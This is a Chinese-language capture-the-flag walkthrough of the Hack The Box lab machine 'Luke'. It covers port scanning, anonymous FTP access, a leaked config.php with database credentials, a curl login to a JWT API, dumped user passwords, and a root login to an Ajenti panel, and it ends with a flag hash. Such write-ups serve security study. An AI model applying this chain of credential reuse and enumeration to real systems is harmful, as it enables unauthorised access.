PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |\_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.7 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit | No session download bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3+ (ext.1) - secure, fast, stable |\_End of status 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3) | http-methods: |\_ Potentially risky methods: TRACE |\_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3 |\_http-title: Luke 3000/tcp open http Node.js Express framework |\_http-title: Site doesn't have a title (application/json; charset=utf-8). 8000/tcp open http Ajenti http control panel |\_http-title: Ajenti

 

开放了ftp,ssh,http和两个奇怪的端口。

3000端口是一个类似于API的东西

8000端口是一个Ajenti cms,爆破常用密码无效。

而FTP允许了匿名登录

发现存放了webapp/for_Chihiro.txt

Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of 
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 

Derry

在80端口dirbuster发现了一个数据库登录凭据

http://10.10.10.137/config.php

$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\\n". $conn -> error);

同时发现了一个需要凭据才能进入的入口

http://10.10.10.137/management

尝试发现该凭据并不能用在该入口。

dirbuster在3000端口的扫描发现存在 /login /user等入口,访问发现都报错”Auth token is not supplied”,猜测可能是一个API,需要登录才能获得数据。

google报错信息,发现可能是基于JWT的API

https://medium.com/dev-bits/a-guide-for-adding-jwt-token-based-authentication-to-your-single-page-nodejs-applications-c403f7cf04f4

查阅上述接口描述文章后发现可以通过特定格式及在config.php发现的凭据成功验证。

curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/login

验证成功

枚举该数据库后发现存在3组用户凭据

{"name":"Admin","password":"WX5b7)>/rp$U)FW"} {"name":"Derry","password":"rZ86wwLvx7jUxtch"} {"name":"Yuri","password":"bet@tester87"} {"name":"Dory","password":"5y:!xa=ybfe)/QD"}

使用其中的Derry凭据可以成功访问之前需要验证才能进入的management入口

在config.json中又发现了一个密码

"password": "KpMasng6S5EtTy9Z"

在8000端口的cms中尝试以root用户名登录成功

8448343028fadde1e2a1b0a44d01e650